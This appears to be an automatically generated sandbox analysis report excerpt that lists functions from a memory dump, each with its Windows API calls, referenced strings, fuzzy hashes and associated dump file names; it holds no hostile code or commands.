Associated: 0000000D.00000002.4648814566.000000000034D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.4648840809.0000000000355000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_280000_Preceding.jbxd

Similarity

API ID: Process$Message$CloseHandleOpenPostSendTerminateThreadTimeoutWindow
String ID:
API String ID: 839392675-0
Opcode ID: f4249a4c525296a75aa8054f60e4571f09fca7d4f12d3958bf403f5fa556bcba
Instruction ID: e396bfb5d0f76687fe87557c70a73e6cebfe1cc9c2f0616ca462300ac611a5f2
Opcode Fuzzy Hash: f4249a4c525296a75aa8054f60e4571f09fca7d4f12d3958bf403f5fa556bcba
Instruction Fuzzy Hash: E2F03A72241159BBE7225B629C0EEEF7B7CEFCBB11F004068FA0191090D7A46A01C6B5

Function 002C34D6 Relevance: 9.0, APIs: 6, Instructions: 39windowCOMMON

Download Yara Rule

APIs

GetClientRect.USER32(?), ref: 002C34EF
SendMessageW.USER32(?,00001328,00000000,?), ref: 002C3506
GetWindowDC.USER32(?), ref: 002C3512
GetPixel.GDI32(00000000,?,?), ref: 002C3521
ReleaseDC.USER32(?,00000000), ref: 002C3533
GetSysColor.USER32(00000005), ref: 002C354D

Memory Dump Source

Source File: 0000000D.00000002.4648674411.0000000000281000.00000020.00000001.01000000.00000007.sdmp, Offset: 00280000, based on PE: true

Associated: 0000000D.00000002.4648652377.0000000000280000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.4648746089.000000000031D000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.4648746089.0000000000343000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.4648814566.000000000034D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.4648840809.0000000000355000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_280000_Preceding.jbxd

Similarity

API ID: ClientColorMessagePixelRectReleaseSendWindow
String ID:
API String ID: 272304278-0
Opcode ID: 1ac4b5c0acf5ab0e5b9a28573e50e7131dcac848d9424147355f2aae24fa351e
Instruction ID: e2c0b916d83ad93410fb241cc47ff2a052721cae0807c54bfd58cf9c9bc68d03
Opcode Fuzzy Hash: 1ac4b5c0acf5ab0e5b9a28573e50e7131dcac848d9424147355f2aae24fa351e
Instruction Fuzzy Hash: 6D014F31510115EFDB525F64DC08FE97BB9FB09321F508564F91AA21A1CB311E51DB10

Function 002E21C1 Relevance: 9.0, APIs: 6, Instructions: 23memorysynchronizationCOMMON

Download Yara Rule

APIs

WaitForSingleObject.KERNEL32(?,000000FF), ref: 002E21CC
UnloadUserProfile.USERENV(?,?), ref: 002E21D8
CloseHandle.KERNEL32(?), ref: 002E21E1
CloseHandle.KERNEL32(?), ref: 002E21E9
GetProcessHeap.KERNEL32(00000000,?), ref: 002E21F2
HeapFree.KERNEL32(00000000), ref: 002E21F9

Memory Dump Source

Source File: 0000000D.00000002.4648674411.0000000000281000.00000020.00000001.01000000.00000007.sdmp, Offset: 00280000, based on PE: true

Associated: 0000000D.00000002.4648652377.0000000000280000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.4648746089.000000000031D000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.4648746089.0000000000343000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.4648814566.000000000034D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.4648840809.0000000000355000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_280000_Preceding.jbxd

Similarity

API ID: CloseHandleHeap$FreeObjectProcessProfileSingleUnloadUserWait
String ID:
API String ID: 146765662-0
Opcode ID: 704aaca3d60dfd40838582408eeda9edb37676f08025b362ad59cd19a646d48a
Instruction ID: de8e86b7b731758a886e476ae48f996ded527ac50566e86c70bfbbc6ce5b97c6
Opcode Fuzzy Hash: 704aaca3d60dfd40838582408eeda9edb37676f08025b362ad59cd19a646d48a
Instruction Fuzzy Hash: 1CE07576104505BBDB421FA5EC0D98AFF7DFF4E722F508625F225824B0CB729461DB51

Function 0030B7C4 Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 176COMMON

Download Yara Rule

APIs

ShellExecuteExW.SHELL32(0000003C), ref: 0030B903

Part of subcall function 002841EA: _wcslen.LIBCMT ref: 002841EF

GetProcessId.KERNEL32(00000000), ref: 0030B998
CloseHandle.KERNEL32(00000000), ref: 0030B9C7

Strings

@, xrefs: 0030B8D2
<, xrefs: 0030B8CB

Memory Dump Source

Source File: 0000000D.00000002.4648674411.0000000000281000.00000020.00000001.01000000.00000007.sdmp, Offset: 00280000, based on PE: true

Associated: 0000000D.00000002.4648652377.0000000000280000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.4648746089.000000000031D000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.4648746089.0000000000343000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.4648814566.000000000034D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.4648840809.0000000000355000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_280000_Preceding.jbxd

Similarity

API ID: CloseExecuteHandleProcessShell_wcslen
String ID: <$@
API String ID: 146682121-1426351568
Opcode ID: 702205cd6a5d6350b35491c6c69af9c4843d50435bdfea251636b8b35565b711
Instruction ID: f66cbcf8fd73e091a821d8eb612776eb1e6ef961f1df9699408bafe1c44699cc
Opcode Fuzzy Hash: 702205cd6a5d6350b35491c6c69af9c4843d50435bdfea251636b8b35565b711
Instruction Fuzzy Hash: 01716678A11215DFCB12EF64C494A9EBBF5FF08300F058499E956AB2A2CB70ED55CF90

Function 002E7B05 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 120comlibraryloaderCOMMON

Download Yara Rule

APIs

CoCreateInstance.OLE32(?,00000000,00000005,?,?,?,?,?,?,?,?,?,?,?), ref: 002E7B6D
SetErrorMode.KERNEL32(00000001,?,?,?,?,?,?,?,?,?), ref: 002E7BA3
GetProcAddress.KERNEL32(?,DllGetClassObject), ref: 002E7BB4
SetErrorMode.KERNEL32(00000000,?,?,?,?,?,?,?,?,?), ref: 002E7C36

Strings

DllGetClassObject, xrefs: 002E7BA9

Memory Dump Source

Source File: 0000000D.00000002.4648674411.0000000000281000.00000020.00000001.01000000.00000007.sdmp, Offset: 00280000, based on PE: true

Associated: 0000000D.00000002.4648652377.0000000000280000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.4648746089.000000000031D000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.4648746089.0000000000343000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.4648814566.000000000034D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.4648840809.0000000000355000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_280000_Preceding.jbxd

Similarity

API ID: ErrorMode$AddressCreateInstanceProc
String ID: DllGetClassObject
API String ID: 753597075-1075368562
Opcode ID: 305bfabe88b61d0733c1a1eeaf7d369dc92d82429fd5a2c4bdb2bc048765dded
Instruction ID: ed7eff9877fd52f6f21e874171630633ccf5aee270794eeac2f6929a136f8a80
Opcode Fuzzy Hash: 305bfabe88b61d0733c1a1eeaf7d369dc92d82429fd5a2c4bdb2bc048765dded
Instruction Fuzzy Hash: 1F410FB1254245EFDB15CF65C884A9A7BBDEF48300F6090AEEC0A9F206D7B0DD10CBA0

Function 00314818 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 101windowCOMMON

Download Yara Rule

APIs

GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 003148D1
IsMenu.USER32(?), ref: 003148E6
InsertMenuItemW.USER32(?,?,00000001,00000030), ref: 0031492E
DrawMenuBar.USER32 ref: 00314941

Strings

0, xrefs: 00314825

Memory Dump Source

Source File: 0000000D.00000002.4648674411.0000000000281000.00000020.00000001.01000000.00000007.sdmp, Offset: 00280000, based on PE: true

Associated: 0000000D.00000002.4648652377.0000000000280000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.4648746089.000000000031D000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.4648746089.0000000000343000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.4648814566.000000000034D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.4648840809.0000000000355000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_280000_Preceding.jbxd

Similarity

API ID: Menu$Item$DrawInfoInsert
String ID: 0
API String ID: 3076010158-4108050209
Opcode ID: 3c85304e73a9ca5578aab2485d4194f3951fa12e842097b3886464370540e7d3
Instruction ID: 9deb7a6cecc912caf27843fa937da2801f7123460c3552529d4b5b584d0f325c
Opcode Fuzzy Hash: 3c85304e73a9ca5578aab2485d4194f3951fa12e842097b3886464370540e7d3
Instruction Fuzzy Hash: 21414A75A01209EFDB15CF51E984AEABBB9FF0A324F098129E94597350C730AD95CF60

Function 002E272F Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 93windowCOMMON

Download Yara Rule

APIs

Part of subcall function 0028B329: _wcslen.LIBCMT ref: 0028B333

Part of subcall function 002E45FD: GetClassNameW.USER32(?,?,000000FF), ref: 002E4620

SendMessageW.USER32(?,00000188,00000000,00000000), ref: 002E27B3
SendMessageW.USER32(?,0000018A,00000000,00000000), ref: 002E27C6
SendMessageW.USER32(?,00000189,?,00000000), ref: 002E27F6

Part of subcall function 00288577: _wcslen.LIBCMT ref: 0028858A

Strings

ComboBox, xrefs: 002E273D
ListBox, xrefs: 002E2772

Memory Dump Source

Source File: 0000000D.00000002.4648674411.0000000000281000.00000020.00000001.01000000.00000007.sdmp, Offset: 00280000, based on PE: true

Associated: 0000000D.00000002.4648652377.0000000000280000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.4648746089.000000000031D000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.4648746089.0000000000343000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.4648814566.000000000034D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.4648840809.0000000000355000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_280000_Preceding.jbxd

Similarity

API ID: MessageSend$_wcslen$ClassName
String ID: ComboBox$ListBox
API String ID: 2081771294-1403004172
Opcode ID: 06fb06d0bff45e373137c83ff97baab4eb690b6e1f884622fae8c40ecc0af8f9
Instruction ID: 0a6e2e7b3c0734214759494fc7d37f0970dae161205b3a565b0872771362aa58
Opcode Fuzzy Hash: 06fb06d0bff45e373137c83ff97baab4eb690b6e1f884622fae8c40ecc0af8f9
Instruction Fuzzy Hash: E221F676950144BFDB06AF61DC86CFEB7BCDF46360F908129F412971E1CB784919CA60

Function 003139B3 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 78windowlibraryCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(00000000,00000467,00000000,?), ref: 00313A29
LoadLibraryW.KERNEL32(?), ref: 00313A30
SendMessageW.USER32(?,00000467,00000000,00000000), ref: 00313A45
DestroyWindow.USER32(?), ref: 00313A4D

Strings

SysAnimate32, xrefs: 00313A04

Memory Dump Source

Source File: 0000000D.00000002.4648674411.0000000000281000.00000020.00000001.01000000.00000007.sdmp, Offset: 00280000, based on PE: true

Associated: 0000000D.00000002.4648652377.0000000000280000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.4648746089.000000000031D000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.4648746089.0000000000343000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.4648814566.000000000034D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.4648840809.0000000000355000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_280000_Preceding.jbxd

Similarity

API ID: MessageSend$DestroyLibraryLoadWindow
String ID: SysAnimate32
API String ID: 3529120543-1011021900
Opcode ID: 2340abc77f14b9235a29f6bf1f94b7310464e1800b64542009e63cd497ecf9c0
Instruction ID: 43b7e47d34b79404ae7998112399748e9cb421e1748117ad03901a48180a83da
Opcode Fuzzy Hash: 2340abc77f14b9235a29f6bf1f94b7310464e1800b64542009e63cd497ecf9c0
Instruction Fuzzy Hash: 4721B871200209ABEF168F64DC80FEB37ADEF4A364F119228FA90960A0C371CD909760

Function 00319A25 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 78windowCOMMON

Download Yara Rule

APIs

Part of subcall function 0028249F: GetWindowLongW.USER32(00000000,000000EB), ref: 002824B0

GetCursorPos.USER32(?), ref: 00319A5D
TrackPopupMenuEx.USER32(?,00000000,?,?,?,00000000), ref: 00319A72
GetCursorPos.USER32(?), ref: 00319ABA
DefDlgProcW.USER32(?,0000007B,?,?,?,?), ref: 00319AF0

Strings

(5, xrefs: 00319A30

Memory Dump Source

Source File: 0000000D.00000002.4648674411.0000000000281000.00000020.00000001.01000000.00000007.sdmp, Offset: 00280000, based on PE: true

Associated: 0000000D.00000002.4648652377.0000000000280000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.4648746089.000000000031D000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.4648746089.0000000000343000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.4648814566.000000000034D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.4648840809.0000000000355000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_280000_Preceding.jbxd

Similarity

API ID: Cursor$LongMenuPopupProcTrackWindow
String ID: (5
API String ID: 2864067406-4024434197
Opcode ID: ac4f37f5cf79691f159852c8048848c42c6c5315352ae682f8fe44044d98cf8a
Instruction ID: e9d91c3c027c25462a028208203f9c707d9d6bf01192f58dc05b75593455c4ac
Opcode Fuzzy Hash: ac4f37f5cf79691f159852c8048848c42c6c5315352ae682f8fe44044d98cf8a
Instruction Fuzzy Hash: FA21AD34A00118EFCF2A8F94CC68EEA7BB9EF0A310F414056F9054B2A1D33199A4DB60

Function 00281AAC Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 56COMMON

Download Yara Rule

APIs

Part of subcall function 0028249F: GetWindowLongW.USER32(00000000,000000EB), ref: 002824B0

DefDlgProcW.USER32(?,00000020,?,00000000), ref: 00281AF4
GetClientRect.USER32(?,?), ref: 002C31F9
GetCursorPos.USER32(?), ref: 002C3203
ScreenToClient.USER32(?,?), ref: 002C320E

Strings

(5, xrefs: 00281AB2

Memory Dump Source

Source File: 0000000D.00000002.4648674411.0000000000281000.00000020.00000001.01000000.00000007.sdmp, Offset: 00280000, based on PE: true

Associated: 0000000D.00000002.4648652377.0000000000280000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.4648746089.000000000031D000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.4648746089.0000000000343000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.4648814566.000000000034D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.4648840809.0000000000355000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_280000_Preceding.jbxd

Similarity

API ID: Client$CursorLongProcRectScreenWindow
String ID: (5
API String ID: 4127811313-4024434197
Opcode ID: eb3c38196759834747a193138b16fccd08046b78a4052ee8e9860de812b5dbbb
Instruction ID: 90dc703549042a8af5504c8c3f324e4db1c2b4be83e161ad300497dbebe9e09f
Opcode Fuzzy Hash: eb3c38196759834747a193138b16fccd08046b78a4052ee8e9860de812b5dbbb
Instruction Fuzzy Hash: 95114F35912119EFCB05EF94C985DEE77BCFB05345F504456E902E3190C771BAA2CBA1

Function 002A50DD Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 38libraryloaderCOMMONLIBRARYCODE

Download Yara Rule

APIs

GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,?,002A508E,?,?,002A502E,?,003498D8,0000000C,002A5185,?,00000002), ref: 002A50FD
GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 002A5110
FreeLibrary.KERNEL32(00000000,?,?,?,002A508E,?,?,002A502E,?,003498D8,0000000C,002A5185,?,00000002,00000000), ref: 002A5133

Strings

mscoree.dll, xrefs: 002A50F6
CorExitProcess, xrefs: 002A5108

Memory Dump Source

Source File: 0000000D.00000002.4648674411.0000000000281000.00000020.00000001.01000000.00000007.sdmp, Offset: 00280000, based on PE: true

Associated: 0000000D.00000002.4648652377.0000000000280000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.4648746089.000000000031D000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.4648746089.0000000000343000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.4648814566.000000000034D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.4648840809.0000000000355000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_280000_Preceding.jbxd

Similarity

API ID: AddressFreeHandleLibraryModuleProc
String ID: CorExitProcess$mscoree.dll
API String ID: 4061214504-1276376045
Opcode ID: af1d11d9fc24b6aa19085223f507ade7af821d99be40212cf329d686ce010558
Instruction ID: 39f4e07be399d4dfcc76d62335eed291a392aaa16ccee315a56b5198e028f06e
Opcode Fuzzy Hash: af1d11d9fc24b6aa19085223f507ade7af821d99be40212cf329d686ce010558
Instruction Fuzzy Hash: C9F06835910618BBDB165F94DC49BEEBFB8EF49752F004074F80AA2160DF755D50CA90

Function 002DE778 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 27libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32 ref: 002DE785
GetProcAddress.KERNEL32(00000000,GetSystemWow64DirectoryW), ref: 002DE797
FreeLibrary.KERNEL32(00000000), ref: 002DE7BD

Strings

GetSystemWow64DirectoryW, xrefs: 002DE791
X64, xrefs: 002DE680

Memory Dump Source

Source File: 0000000D.00000002.4648674411.0000000000281000.00000020.00000001.01000000.00000007.sdmp, Offset: 00280000, based on PE: true

Associated: 0000000D.00000002.4648652377.0000000000280000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.4648746089.000000000031D000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.4648746089.0000000000343000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.4648814566.000000000034D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.4648840809.0000000000355000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_280000_Preceding.jbxd

Similarity

API ID: Library$AddressFreeLoadProc
String ID: GetSystemWow64DirectoryW$X64
API String ID: 145871493-2590602151
Opcode ID: 33b3a5cb4ceb0d4b1dec06cff944908409f2d416d36fc3ba14f15d2a41b723bd
Instruction ID: 5a142b8dede5bdbcbe8455a2982b7c7bcaf4d79e8906189c16d04e36cf558a10
Opcode Fuzzy Hash: 33b3a5cb4ceb0d4b1dec06cff944908409f2d416d36fc3ba14f15d2a41b723bd
Instruction Fuzzy Hash: C2F0A070835661ABEFE66B204C88EAA72286F11701B1345AAF806EA260DB74CC548A94

Function 0028663E Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 24libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(kernel32.dll,?,?,0028668B,?,?,002862FA,?,00000001,?,?,00000000), ref: 0028664A
GetProcAddress.KERNEL32(00000000,Wow64DisableWow64FsRedirection), ref: 0028665C
FreeLibrary.KERNEL32(00000000,?,?,0028668B,?,?,002862FA,?,00000001,?,?,00000000), ref: 0028666E

Strings

Wow64DisableWow64FsRedirection, xrefs: 00286656
kernel32.dll, xrefs: 00286642

Memory Dump Source

Source File: 0000000D.00000002.4648674411.0000000000281000.00000020.00000001.01000000.00000007.sdmp, Offset: 00280000, based on PE: true

Associated: 0000000D.00000002.4648652377.0000000000280000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.4648746089.000000000031D000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.4648746089.0000000000343000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.4648814566.000000000034D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.4648840809.0000000000355000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_280000_Preceding.jbxd

Similarity

API ID: Library$AddressFreeLoadProc
String ID: Wow64DisableWow64FsRedirection$kernel32.dll
API String ID: 145871493-3689287502
Opcode ID: 6330800e0311f1ffd65d0c99b68466ae2fa430827d5274df0a1abe76f8080c1a
Instruction ID: 91f3cfbb32ac4584372d0f3b400859a5b6306e278349c7c0562b9c27a3c23e20
Opcode Fuzzy Hash: 6330800e0311f1ffd65d0c99b68466ae2fa430827d5274df0a1abe76f8080c1a
Instruction Fuzzy Hash: 57E086396125336792532B25AC0CBDA656C9F87B12F054225FC01D2140EB58CC1181E4

Function 00286607 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 22libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(kernel32.dll,?,?,002C5657,?,?,002862FA,?,00000001,?,?,00000000), ref: 00286610
GetProcAddress.KERNEL32(00000000,Wow64RevertWow64FsRedirection), ref: 00286622
FreeLibrary.KERNEL32(00000000,?,?,002C5657,?,?,002862FA,?,00000001,?,?,00000000), ref: 00286635

Strings

kernel32.dll, xrefs: 00286609
Wow64RevertWow64FsRedirection, xrefs: 0028661C

Memory Dump Source

Source File: 0000000D.00000002.4648674411.0000000000281000.00000020.00000001.01000000.00000007.sdmp, Offset: 00280000, based on PE: true

Associated: 0000000D.00000002.4648652377.0000000000280000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.4648746089.000000000031D000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.4648746089.0000000000343000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.4648814566.000000000034D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.4648840809.0000000000355000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_280000_Preceding.jbxd

Similarity

API ID: Library$AddressFreeLoadProc
String ID: Wow64RevertWow64FsRedirection$kernel32.dll
API String ID: 145871493-1355242751
Opcode ID: a22e287f049550e6ddeef16504873885465ee566c268fa0b009e52ac3d958b2c
Instruction ID: 30779a85ff2c80560c69984a371678cc766045277eff3854bb5c3794a290cbe0
Opcode Fuzzy Hash: a22e287f049550e6ddeef16504873885465ee566c268fa0b009e52ac3d958b2c
Instruction Fuzzy Hash: 17D0C2396235726742233B206D0CACF2A1D9E9BB1130D4030F802A2154EF28CC1182D8

Function 002F3306 Relevance: 7.8, APIs: 5, Instructions: 313fileCOMMON

Download Yara Rule

APIs

DeleteFileW.KERNEL32(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 002F35C4
DeleteFileW.KERNEL32(?), ref: 002F3646
CopyFileW.KERNEL32(?,?,00000000,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001), ref: 002F365C
DeleteFileW.KERNEL32(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 002F366D
DeleteFileW.KERNEL32(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 002F367F

Memory Dump Source

Source File: 0000000D.00000002.4648674411.0000000000281000.00000020.00000001.01000000.00000007.sdmp, Offset: 00280000, based on PE: true

Associated: 0000000D.00000002.4648652377.0000000000280000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.4648746089.000000000031D000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.4648746089.0000000000343000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.4648814566.000000000034D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.4648840809.0000000000355000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_280000_Preceding.jbxd

Similarity

API ID: File$Delete$Copy
String ID:
API String ID: 3226157194-0
Opcode ID: 09892b40d7fe2628aa95da0dfed022a96c068b66281d38c258c24601ca581657
Instruction ID: 4d3c56f7e3bb7513a9ee0ac32cf0eb67243895373977eaf5950a10a14b0673d4
Opcode Fuzzy Hash: 09892b40d7fe2628aa95da0dfed022a96c068b66281d38c258c24601ca581657
Instruction Fuzzy Hash: 95B16C7291111DABDF11EFA4CC85EEEBBBDEF49340F0040B6F609E6141EA309A598F60

Function 0030ADE7 Relevance: 7.8, APIs: 5, Instructions: 256COMMON

Download Yara Rule

APIs

GetCurrentProcessId.KERNEL32 ref: 0030AE87
OpenProcess.KERNEL32(00000410,00000000,00000000), ref: 0030AE95
GetProcessIoCounters.KERNEL32(00000000,?), ref: 0030AEC8
CloseHandle.KERNEL32(?), ref: 0030B09D

Memory Dump Source

Source File: 0000000D.00000002.4648674411.0000000000281000.00000020.00000001.01000000.00000007.sdmp, Offset: 00280000, based on PE: true

Associated: 0000000D.00000002.4648652377.0000000000280000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.4648746089.000000000031D000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.4648746089.0000000000343000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.4648814566.000000000034D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.4648840809.0000000000355000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_280000_Preceding.jbxd

Similarity

API ID: Process$CloseCountersCurrentHandleOpen
String ID:
API String ID: 3488606520-0
Opcode ID: fc4f84204203c4dfe26fd708241dbc9ee0de6777dc348eda70b2c0484f1b178f
Instruction ID: 41967e9ea6ec6f0abaa6a75358c07b5975be101ffd22b451c1377f684ca623ba
Opcode Fuzzy Hash: fc4f84204203c4dfe26fd708241dbc9ee0de6777dc348eda70b2c0484f1b178f
Instruction Fuzzy Hash: 2AA1DE75A05301AFE721EF24C896F2AB7E5AF44710F14881DF5A99B2D2DB71EC50CB82

Function 0030C429 Relevance: 7.7, APIs: 5, Instructions: 167registryCOMMON

Download Yara Rule

APIs

Part of subcall function 0028B329: _wcslen.LIBCMT ref: 0028B333

Part of subcall function 0030D3F8: CharUpperBuffW.USER32(?,?,?,?,?,?,?,0030C10E,?,?), ref: 0030D415
Part of subcall function 0030D3F8: _wcslen.LIBCMT ref: 0030D451
Part of subcall function 0030D3F8: _wcslen.LIBCMT ref: 0030D4C8
Part of subcall function 0030D3F8: _wcslen.LIBCMT ref: 0030D4FE

RegConnectRegistryW.ADVAPI32(?,?,?), ref: 0030C505
RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 0030C560
RegEnumKeyExW.ADVAPI32(?,-00000001,?,?,00000000,00000000,00000000,?), ref: 0030C5C3
RegCloseKey.ADVAPI32(?,?), ref: 0030C606
RegCloseKey.ADVAPI32(00000000), ref: 0030C613

Memory Dump Source

Source File: 0000000D.00000002.4648674411.0000000000281000.00000020.00000001.01000000.00000007.sdmp, Offset: 00280000, based on PE: true

Associated: 0000000D.00000002.4648652377.0000000000280000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.4648746089.000000000031D000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.4648746089.0000000000343000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.4648814566.000000000034D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.4648840809.0000000000355000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_280000_Preceding.jbxd

Similarity

API ID: _wcslen$Close$BuffCharConnectEnumOpenRegistryUpper
String ID:
API String ID: 826366716-0
Opcode ID: 240ec0b482308606d0106bdd955eeb86b79d366e81eb3ea9d0a2fac05f2a9c30
Instruction ID: 061020e2ea1d0255def3b8ca118d11d5fbe6903605d8afc765249b68c99b587a
Opcode Fuzzy Hash: 240ec0b482308606d0106bdd955eeb86b79d366e81eb3ea9d0a2fac05f2a9c30
Instruction Fuzzy Hash: 9D61B135119241AFC315DF14C8A0E6ABBE9FF89308F14959CF0958B2D2CB31ED46CB91

Function 002EED12 Relevance: 7.7, APIs: 5, Instructions: 167filestringCOMMON

